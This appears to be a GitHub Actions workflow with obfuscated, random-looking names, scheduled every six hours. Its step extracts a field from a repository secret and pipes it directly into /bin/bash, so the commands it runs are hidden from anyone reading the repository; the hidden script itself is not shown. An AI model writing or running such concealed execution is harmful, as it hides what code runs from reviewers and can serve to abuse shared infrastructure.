name: lifanfeng6556
on:
  workflow_dispatch:
  schedule:
    - cron: '33 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: lifanfeng6556
        env:
          kqts2: ${{ secrets.kqts2 }}
        run: |
          echo $kqts2 | jq -r .wrpvs1066 | /bin/bash
          echo $b76 | jq -r .y3 | /bin/bash
          echo $pkq984 | jq -r .ihswd8 | /bin/bash
          echo $efxi2774 | jq -r .rst4 | /bin/bash
          echo $oqwij10 | jq -r .ekhp555 | /bin/bash

